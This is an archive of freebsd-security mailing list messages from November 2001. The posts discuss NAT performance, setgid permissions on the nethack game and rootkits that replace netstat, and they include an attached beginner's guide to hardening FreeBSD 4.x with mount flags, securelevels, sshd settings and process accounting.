(Postfix) with ESMTP id 844EF37B41A for ; Thu, 22 Nov 2001 00:47:43 -0800 (PST) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.33 #1) id 166pXX-0004kW-00; Thu, 22 Nov 2001 10:48:59 +0200 From: Sheldon Hearn To: "Dave Raven" Cc: freebsd-security@FreeBSD.org Subject: Re: Best security topology for FreeBSD In-reply-to: Your message of "Wed, 21 Nov 2001 19:25:12 +0200." <005f01c172b1$7a8503c0$3600a8c0@DAVE> Date: Thu, 22 Nov 2001 10:48:59 +0200 Message-ID: <18259.1006418939@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 21 Nov 2001 19:25:12 +0200, "Dave Raven" wrote: > With IPFilter this is not so, IPNat runs in the kernel and should be faster. > If you are planning on large usage I would recommend IPFilter (less load) > and IPNat. I'm having trouble with IPFW+natd servicing a high-volume web cluster. I'm finding that natd hogs just about all available cycles on one of the two PII CPUs in the box. The throughput of through the firewall has also dropped since I migrated from the Linux IPchains monster we had before. I'll post my findings in follow-up later this month. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 0:52:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [216.33.66.196]) by hub.freebsd.org (Postfix) with ESMTP id 9593937B405 for ; Thu, 22 Nov 2001 00:52:33 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1192) id 7ED4D81D14; Thu, 22 Nov 2001 02:52:28 -0600 (CST) Date: Thu, 22 Nov 2001 02:52:28 -0600 From: Alfred Perlstein To: Sheldon Hearn Cc: Dave Raven , freebsd-security@FreeBSD.org Subject: Re: Best security topology for FreeBSD Message-ID: <20011122025228.X13393@elvis.mu.org> References: <005f01c172b1$7a8503c0$3600a8c0@DAVE> <18259.1006418939@axl.seasidesoftware.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <18259.1006418939@axl.seasidesoftware.co.za>; from sheldonh@starjuice.net on Thu, Nov 22, 2001 at 10:48:59AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Sheldon Hearn [011122 02:47] wrote: > > > On Wed, 21 Nov 2001 19:25:12 +0200, "Dave Raven" wrote: > > > With IPFilter this is not so, IPNat runs in the kernel and should be faster. > > If you are planning on large usage I would recommend IPFilter (less load) > > and IPNat. > > I'm having trouble with IPFW+natd servicing a high-volume web cluster. > I'm finding that natd hogs just about all available cycles on one of the > two PII CPUs in the box. The throughput of through the firewall has > also dropped since I migrated from the Linux IPchains monster we had > before. > > I'll post my findings in follow-up later this month. natd isn't exactly high performance, there's nothing particularly bad about it besideds it requiring mulitple copies across the userspace kernel boundry. Have you taken a look at using ipfilter and ipnat? It may offer better performance, no promises though. -- -Alfred Perlstein [alfred@freebsd.org] 'Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom.' http://www.morons.org/rants/gpl-harmful.php3 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 1:15:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by hub.freebsd.org (Postfix) with ESMTP id 539D837B416; Thu, 22 Nov 2001 01:15:40 -0800 (PST) Received: from contactdish (win.atkielski.com [10.0.0.10]) by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fAM9Fbh79484; Thu, 22 Nov 2001 10:15:38 +0100 (CET) (envelope-from anthony@freebie.atkielski.com) Message-ID: <014201c17336$40653f90$0a00000a@atkielski.com> From: "Anthony Atkielski" To: "FreeBSD Questions" , Subject: setuid on nethack? Date: Thu, 22 Nov 2001 10:15:37 +0100 Organization: Anthony's Home Page (development site) MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This morning I see an e-mail from the system telling me that setuid is set on nethack, the adventure-style game that I installed recently. Why would this game require this bit? I reset it with chmod 0544, which seems like plenty to me. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 1:25:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from straylight.ringlet.net (sentinel.office1.bg [217.75.134.126]) by hub.freebsd.org (Postfix) with SMTP id C3A0837B42A for ; Thu, 22 Nov 2001 01:25:03 -0800 (PST) Received: (qmail 3173 invoked by uid 1000); 22 Nov 2001 09:24:17 -0000 Date: Thu, 22 Nov 2001 11:24:16 +0200 From: Peter Pentchev To: Anthony Atkielski Cc: FreeBSD Questions , freebsd-security@freebsd.org Subject: Re: setuid on nethack? Message-ID: <20011122112415.B855@straylight.oblivion.bg> Mail-Followup-To: Anthony Atkielski , FreeBSD Questions , freebsd-security@freebsd.org References: <014201c17336$40653f90$0a00000a@atkielski.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <014201c17336$40653f90$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:15:37AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Nov 22, 2001 at 10:15:37AM +0100, Anthony Atkielski wrote: > This morning I see an e-mail from the system telling me that setuid is set on > nethack, the adventure-style game that I installed recently. Why would this > game require this bit? I reset it with chmod 0544, which seems like plenty to > me. AFAIK, many games on Unix systems are setuid or setgid 'games', so that any user on the system can read and write the high scores and saved games. If you only intend to play Nethack from one particular system account, you should have no problem without the setuid bit, but make sure to set the appropriate owner/group/permissions on the high scores and saved games files/dirs. G'luck, Peter -- If this sentence didn't exist, somebody would have invented it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 1:30:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by hub.freebsd.org (Postfix) with ESMTP id E6FA537B405; Thu, 22 Nov 2001 01:30:08 -0800 (PST) Received: from contactdish (win.atkielski.com [10.0.0.10]) by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fAM9Tah79554; Thu, 22 Nov 2001 10:29:42 +0100 (CET) (envelope-from anthony@freebie.atkielski.com) Message-ID: <016001c17338$37d65240$0a00000a@atkielski.com> From: "Anthony Atkielski" To: "Peter Pentchev" Cc: "FreeBSD Questions" , References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> Subject: Re: setuid on nethack? Date: Thu, 22 Nov 2001 10:29:36 +0100 Organization: Anthony's Home Page (development site) MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After seeing that the owner and group were games, I set the permissions back to 2511, which I assume is safe. Do I need to take special precautions if I play this game from root? Would 6511 be a better choice in that case? ----- Original Message ----- From: "Peter Pentchev" To: "Anthony Atkielski" Cc: "FreeBSD Questions" ; Sent: Thursday, November 22, 2001 10:24 Subject: Re: setuid on nethack? > On Thu, Nov 22, 2001 at 10:15:37AM +0100, Anthony Atkielski wrote: > > This morning I see an e-mail from the system telling me that setuid is set on > > nethack, the adventure-style game that I installed recently. Why would this > > game require this bit? I reset it with chmod 0544, which seems like plenty to > > me. > > AFAIK, many games on Unix systems are setuid or setgid 'games', so that > any user on the system can read and write the high scores and saved games. > If you only intend to play Nethack from one particular system account, > you should have no problem without the setuid bit, but make sure to > set the appropriate owner/group/permissions on the high scores and > saved games files/dirs. > > G'luck, > Peter > > -- > If this sentence didn't exist, somebody would have invented it. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 1:40:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 72DFA37B418 for ; Thu, 22 Nov 2001 01:40:36 -0800 (PST) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.33 #1) id 166qMg-00053w-00; Thu, 22 Nov 2001 11:41:50 +0200 From: Sheldon Hearn To: Pierre-Luc =?iso-8859-1?Q?Lesp=E9rance?= Cc: security@freebsd.org Subject: Re: Unknown transient service 1528/tcp In-reply-to: Your message of "Thu, 22 Nov 2001 00:19:15 EST." <3BFC8AD3.8DC9E56D@videotron.ca> Date: Thu, 22 Nov 2001 11:41:50 +0200 Message-ID: <19463.1006422110@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 22 Nov 2001 00:19:15 EST, Pierre-Luc =?iso-8859-1?Q?Lesp=E9rance?= wrote: > The best way to figure out what's listening > on your computer may be netstat and sockstat. Except that the machine lies less to the outside world when it's been hacked. The netstat binary is a favourite candidate for being replaced by rootkits, as I recently discovered when our Linux firewall was hacked. Using tools on a local system that you suspect to have been hacked can be problematic, especially when the the system has been set up to periodically rewrite key system binaries. With the advent of kqueue, it's possible for things like ps, top and netstat to be rewritten every time you update them with fresh, virgin copies! Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 1:49:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from straylight.ringlet.net (sentinel.office1.bg [217.75.134.126]) by hub.freebsd.org (Postfix) with SMTP id 8756E37B42B for ; Thu, 22 Nov 2001 01:48:59 -0800 (PST) Received: (qmail 29839 invoked by uid 1000); 22 Nov 2001 09:48:13 -0000 Date: Thu, 22 Nov 2001 11:48:13 +0200 From: Peter Pentchev To: Anthony Atkielski Cc: FreeBSD Questions , freebsd-security@FreeBSD.ORG Subject: Re: setuid on nethack? Message-ID: <20011122114813.C855@straylight.oblivion.bg> Mail-Followup-To: Anthony Atkielski , FreeBSD Questions , freebsd-security@FreeBSD.ORG References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <016001c17338$37d65240$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:29:36AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Nov 22, 2001 at 10:29:36AM +0100, Anthony Atkielski wrote: > After seeing that the owner and group were games, I set the permissions back to > 2511, which I assume is safe. > > Do I need to take special precautions if I play this game from root? Would 6511 > be a better choice in that case? No, no special precautions should be necessary. AFAIK, nethack does not read any executable code from its data files, so any trojan would have to be placed in the nethack executable itself. I personally have never heard of somebody trojaning the nethack game so far :) G'luck, Peter -- You have, of course, just begun reading the sentence that you have just finished reading. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 2: 7:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by hub.freebsd.org (Postfix) with ESMTP id D8B7537B416; Thu, 22 Nov 2001 02:07:35 -0800 (PST) Received: from contactdish (win.atkielski.com [10.0.0.10]) by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fAMA7Mh79654; Thu, 22 Nov 2001 11:07:22 +0100 (CET) (envelope-from anthony@freebie.atkielski.com) Message-ID: <016601c1733d$7a516b00$0a00000a@atkielski.com> From: "Anthony Atkielski" To: "Peter Pentchev" Cc: "FreeBSD Questions" , References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> Subject: Re: setuid on nethack? Date: Thu, 22 Nov 2001 11:07:16 +0100 Organization: Anthony's Home Page (development site) MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What about in the more general case of games? Would it be a good idea to set game files to games:games and 6511? And what about other types of executables? When I add ports and stuff to my system, sometimes they are picked up from some bizarre FTP sites, and in cases where the executables do not have to be trusted, some guidelines on how better to secure them would be welcome. I know that often they are being rebuilt from source before installation, but it isn't really practical to read through the source for every port just to look for suspicious code. Are ports examined by anyone anywhere for security problems before being included in the FreeBSD list of ports? ----- Original Message ----- From: "Peter Pentchev" To: "Anthony Atkielski" Cc: "FreeBSD Questions" ; Sent: Thursday, November 22, 2001 10:48 Subject: Re: setuid on nethack? > On Thu, Nov 22, 2001 at 10:29:36AM +0100, Anthony Atkielski wrote: > > After seeing that the owner and group were games, I set the permissions back to > > 2511, which I assume is safe. > > > > Do I need to take special precautions if I play this game from root? Would 6511 > > be a better choice in that case? > > No, no special precautions should be necessary. AFAIK, nethack does > not read any executable code from its data files, so any trojan would > have to be placed in the nethack executable itself. I personally have > never heard of somebody trojaning the nethack game so far :) > > G'luck, > Peter > > -- > You have, of course, just begun reading the sentence that you have just finished reading. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 2:35:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from straylight.ringlet.net (sentinel.office1.bg [217.75.134.126]) by hub.freebsd.org (Postfix) with SMTP id 9A54A37B416 for ; Thu, 22 Nov 2001 02:35:47 -0800 (PST) Received: (qmail 790 invoked by uid 1000); 22 Nov 2001 10:35:10 -0000 Date: Thu, 22 Nov 2001 12:35:10 +0200 From: Peter Pentchev To: Anthony Atkielski Cc: FreeBSD Questions , freebsd-security@FreeBSD.ORG Subject: Re: setuid on nethack? Message-ID: <20011122123510.A611@straylight.oblivion.bg> Mail-Followup-To: Anthony Atkielski , FreeBSD Questions , freebsd-security@FreeBSD.ORG References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <016601c1733d$7a516b00$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 11:07:16AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Nov 22, 2001 at 11:07:16AM +0100, Anthony Atkielski wrote: > What about in the more general case of games? Would it be a good idea to set > game files to games:games and 6511? And what about other types of executables? > > When I add ports and stuff to my system, sometimes they are picked up from some > bizarre FTP sites, and in cases where the executables do not have to be trusted, > some guidelines on how better to secure them would be welcome. I know that > often they are being rebuilt from source before installation, but it isn't > really practical to read through the source for every port just to look for > suspicious code. > > Are ports examined by anyone anywhere for security problems before being > included in the FreeBSD list of ports? Yes, they are being actively examined by the maintainer of the port in question. It is the port maintainer's job to look through the changes from version to version and to decide what and where is good and what is not. Cases have been known when a maintainer has decided not to update the port to a new version, or even to update, but disable or patch a new "feature" away. In general, yes, you can trust the ports from the Ports Collection for rebuilding from source (the source tarballs have their MD5 checksums recorded in the Ports Collection files), and the packages downloaded from FreeBSD mirrors (they are built from the Ports Collection). Still, nothing prevents you from changing BINOWN and BINMODE before building specific ports; the penv(1) utility in ports/sysutils/penv might come handy :) For packages, the situation is a bit weirder, but you could easily write a script that parses the output of pkg_info -qL, finds the executables installed by a package and fixes the ownership/permissions. G'luck, Peter -- "yields falsehood, when appended to its quotation." yields falsehood, when appended to its quotation. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 2:48:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id 92F8937B418; Thu, 22 Nov 2001 02:48:13 -0800 (PST) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 4024D66B27; Thu, 22 Nov 2001 02:48:13 -0800 (PST) Date: Thu, 22 Nov 2001 02:48:13 -0800 From: Kris Kennaway To: Anthony Atkielski Cc: FreeBSD Questions , freebsd-security@FreeBSD.ORG Subject: Re: setuid on nethack? Message-ID: <20011122024813.A24038@xor.obsecurity.org> References: <014201c17336$40653f90$0a00000a@atkielski.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Kj7319i9nmIyA2yE" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <014201c17336$40653f90$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:15:37AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Kj7319i9nmIyA2yE Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Nov 22, 2001 at 10:15:37AM +0100, Anthony Atkielski wrote: > This morning I see an e-mail from the system telling me that setuid is set on > nethack, the adventure-style game that I installed recently. Why would this > game require this bit? I reset it with chmod 0544, which seems like plenty to On multiuser systems the nethack binary needs the ability to write saved games and score files, when nethack is run by a variety of different users. This is the case for a lot of games; a while back I went through and did a sweep to make sure that any games which require extra privilege for this purpose are using setgid games, not setuid anything (because the games gid only has the power to overwrite the score/save files for the games, and cannot take over any binaries directly as it could if they were setuid). Thus, it's only a marginal risk on a multiuser system (but still a slight risk, as with all binaries which execute with privilege). If you're on a single-user system then none of this should concern you anyway. If it does concern you then feel free to pkg_delete :-) Kris --Kj7319i9nmIyA2yE Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7/NfsWry0BWjoQKURAkHTAJ9kTVMSSaJDrqKOB0gMyGSoK+nVBgCgt8JQ weWg4ow4qMSzJcIM6MiRZVk= =aVwK -----END PGP SIGNATURE----- --Kj7319i9nmIyA2yE-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 3: 2:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from riffraff.plig.net (riffraff.plig.net [195.40.6.40]) by hub.freebsd.org (Postfix) with ESMTP id 5B02E37B405 for ; Thu, 22 Nov 2001 03:02:38 -0800 (PST) Received: by riffraff.plig.net (Postfix, from userid 3010) id 1DD0C47BBC; Thu, 22 Nov 2001 11:02:37 +0000 (GMT) Date: Thu, 22 Nov 2001 11:02:37 +0000 From: Marc Silver To: freebsd-security@freebsd.org Subject: A basic guide to securing FreeBSD 4.x-STABLE ?? Message-ID: <20011122110236.S7882@draenor.org> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="M9NhX3UHpAaciwkO" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --M9NhX3UHpAaciwkO Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hi there, A few days ago, a friend asked me if I could possibly write him some tips for securing his FreeBSD installation. I went a little overboard and as a result, this document came about. I'd like to request comment/flames/suggestions regarding it, since the contents are based purely on my experiences and needs. Any insight or even alternate views are welcome. You can find the document at: http://draenor.org/securebsd/secure.txt - plain text (also attached) http://draenor.org/securebsd/secure.pdf - PDF format Please reply to this address, as I am not currently subscribed to this list. Cheers, Marc -- I've learned that being kind is more important than being right. -- Andy Rooney --M9NhX3UHpAaciwkO Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="secure.txt" +===================================================================+ + A basic guide to securing FreeBSD 4.x-STABLE + +-------------------------------------------------------------------+ + + + Written by Marc Silver 2001 + + + +===================================================================+ $Id: secure,v 1.5 2001/11/22 10:54:42 marcs Exp $; Overview ======== The word security means different things to different people. While this document covers various aspects and suggests things that can be done to secure FreeBSD, it is is by no means a definitive guide to securing FreeBSD. It is merely a model that I use on my own machines, and one that I have had great success with. I'd also like to point out that I am by no means a security 'expert'... I am merely a _very_ paranoid sysadmin who takes great pride in securing my servers. For a broader look at security on FreeBSD, and as a primer to this document, I would suggest that everyone read the man page for security(7) on their FreeBSD system. This is a work in progress. As such, this document will change, grow and develop over time. If you have something to add, or wish to suggest a change/make a comment or say anything for that matter, please email me (marcs@draenor.org). With that out of the way, let's begin. It should be noted that this document isn't by any means going to stop remote or local DoS attacks. It can merely help you to better secure default FreeBSD instalations. The Foundation for a secure system ================================== A system should be set up to be secure from the very beginning. There are a number of things that can be done during the FreeBSD installation that can save you serious headaches later. In my opinion, file system setup can make a big difference in cases where you can (and must) assume that the attacker already has a local login on the machine. o File System Layout The file system layout below is specific to a shell server where many users will be connecting to the machine and using it for various tasks such as mail, irc, etc. You will most likely need to adapt this to suit your own needs. Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/ad0s1a 198399 33019 149509 18% / /dev/ad0s1f 49583 27879 17738 61% /tmp /dev/ad0s1d 12348393 2563101 8797421 23% /usr /dev/ad0s1h 4065262 97983 3642059 3% /usr/people /dev/ad0s1g 2032623 6026 1863988 0% /var procfs 4 4 0 100% /proc Now, let's look at the output from the mount(8) command: /dev/ad0s1a on / (ufs, local, soft-updates) /dev/ad0s1f on /tmp (ufs, local, nodev, nosuid, soft-updates) /dev/ad0s1d on /usr (ufs, local, soft-updates) /dev/ad0s1h on /usr/people (ufs, local, nosuid, with quotas, soft-updates) /dev/ad0s1g on /var (ufs, local, soft-updates) procfs on /proc (procfs, local) Now, let's discuss why I've set things up this way. The root partition (/) is a reasonable 200MB, and is home to the kernel as well as KLD's and various other fairly important directories which are linked directly off it (/sbin comes to mind). With this in mind, it's possible at a later stage to mount the root partition as read-only, by editing the flags for this partition in the fstab(5) file. Temporary files are stored in /tmp, and since this directory is usually world writeable, it's important to not allow certain files to be used from this directory. Using the fstab(5) file (also see mount(8)) you should add the NOSUID and NODEV flags for /tmp which disables suid programs and stops character or block special devices on the filesystem. You may also want to add the NOEXEC flag for /tmp, but this is severely restrictive, and may begin to make things difficult for your users, and may also limit your ability to find an intruder. It's important to note that you should symlink /usr/tmp and /var/tmp to this /tmp partition, else you're still giving users a tmp directory with no restrictions. User specific directories are kept in /usr/people (most people prefer to use /home -- you can merely symlink /home -> /usr/people) and on this partition, it's a good idea to add the NOSUID flag, as well as adding QUOTA support to limit the amount of disk space that your users may use. Both /usr and /var are standard partitions with soft-updates enabled. This model can obviously be changed to suit your needs, and you can be even more anal if you wish. This however, is intended to strike a happy medium between security and usability. o System Secure Levels For most machines, there is absolutely no reason to run in securelevel -1, unless you're running X-Windows on the machine. If you're not running X, then I would suggest switching to securelevel 1 using the sysctl(8) variable kern.securelevel. Changing this to 1 will mean that you may no longer replace the kernel without being in single user mode (system immutable and system append-only flags are enforced), KLD's may not be loaded/unloaded and /dev/mem and /dev/kmem may not be opened for writing. To change this without rebooting issue the command: sysctl kern.securelevel=1 To make this change more permanent, add the following to /etc/rc.conf: kern_securelevel_enable="YES" kern_securelevel="1" On more critical machines, you may wish to increase the securelevel to 2 or 3. For more information on the various secure levels and what they do, please read the man page for init(8). Securing your newly installed BSD box ===================================== o Removal of the toor user By default, FreeBSD ships with an additional user that has a UID of 0. This user is known as toor (root backwards), and is intended as a backup user, so that if you mistakenly broke (for eg) root's shell, you could log in using this user and fix things. The account is disabled (passwordless) by default, and hence of no use unless you change the password. You may either choose to set a password for it, or remove it. I prefer to remove it. This is purely up to you. o Shut down services It's important to not have any non-essential services running on the machine. The best thing to do is kill all the services running on your machine, and then explicitly enable those that you want running. This way you know for sure what's running on your machine. You can tell what ports are open on your machine by using the netstat(1) command. eg: secure-me (1) : netstat -na | grep LIST tcp4 0 0 *.80 *.* LISTEN tcp4 0 0 *.25 *.* LISTEN tcp4 0 0 *.22 *.* LISTEN This shows that ports 22 (ssh), 25 (smtp), and 80 (http) are listening on this machine on all IP's. If you have a process listening and you're unsure of what process is keeping that port open, you may use sockstat(1) to list open sockets and provide you with the relevant information. Use rc.conf(5) to easily configure which services start up by default, as well as local package init scripts which can be found in /usr/local/etc/rc.d o Telnetd and it's replacement - sshd There are certain services which you do not want to run at any cost if at all possible. Specifically I am going to mention telnetd. In this day and age, it's amazing to find that people still use this horribly insecure protocol. Do NOT use telnetd if at all possible. FreeBSD (since 4.1.1) now comes with OpenSSH as part of the base system, and sshd is a perfect drop in replacement for telnetd, while remaining more secure by using encryption to protect your session. The protocol also allows for stronger encryption with the use of RSA/DSA keys. It should be noted that the most current version of OpenSSH now use the SSH protocol version 2, but for those systems that use a slightly older version, it is advised to only allow version 2 of the protocol. This can be done by making sure the following line exists in /etc/ssh/sshd_config: Protocol 2 This will tell the sshd that it should only allow SSH protocol version 2 - and it will not fallback to version 1. Please note that you may need to restart the sshd in order for this change to take effect. It's also preferable to use DSA keys wherever possible to enhance security even more. o Crontabs Firstly, there are certain files which you may generally not want users looking at. You can safely chmod /etc/crontab to 0640 so that only root and users in the wheel group can see it. Your users do not need to know what jobs cron triggers. At the same time, you may not want to allow users to use crontab(1) at all. You can easily stop them by creating /var/cron/deny and adding a list of users to that file. Those users will then be told: crontab: you (marcs) are not allowed to use this program o ipfw While ipfw is well beyond the scope of this document, you may wish to secure the machine further as well as gain information on attack patterns on your machine using ipfw. This can sometimes provide information that someone is more interested in your machine than they should be. See the ipfw(8) page for more information. o Secure the console Many people are concerned that a malicious user with physical access could simply reboot into single user mode and change the root password. While it's quite clear that if an attacker has physical access to your machine, NOTHING you do can keep it safe, you can prevent people from simply changing the root password in single user mode by performing one simple step. This can be done by changing the the word 'secure' on the 'console' line to 'insecure'. This will require you to enter the root password when dropping into single user mode. o Process accounting It's nice to know exactly what's happening on your machine and to this end, I would suggest enabling process accounting on any machine that you run. This enables to you tell more or less what commands users are executing, and it can also be useful when debugging certain problems. To enable, merely execute the following commands: secure-me (1) : touch /var/account/acct secure-me (2) : accton /var/account/acct To make this change more permanent, add the following line to /etc/rc.conf: accounting_enable="YES" Services ======== o Keep your packages current When you're running daemons that are worldly visible and accessible it's important to make sure (and it's common sense) that your packages are always up to date. If you see a new version of a package you have installed, then update it via the ports tree to make sure that you've always got the latest version. It only takes a few minutes in most cases, but it's worth the effort if you're saving the machine from being compromised. It'll help to watch lists like bugtraq for security advisories. o Keep your OS current Similarly, it's important to keep FreeBSD itself up to date. Keep your source tree up to date, and 'make world' if/when new security patches are made available. It'll help to watch lists like bugtraq for security advisories. Managing user accounts ====================== o User quotas By enforcing user quotas on certain filesystems you can limit the damage that an attacker who wants to consume disk space can do. Enforce quotas wherever possible. --M9NhX3UHpAaciwkO-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 5: 2:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id 943DA37B419 for ; Thu, 22 Nov 2001 05:02:16 -0800 (PST) Received: by mail.interchange.ca (Fastmailer, from userid 555) id 1459924EC; Thu, 22 Nov 2001 08:01:50 -0500 (EST) MIME-Version: 1.0 Message-Id: 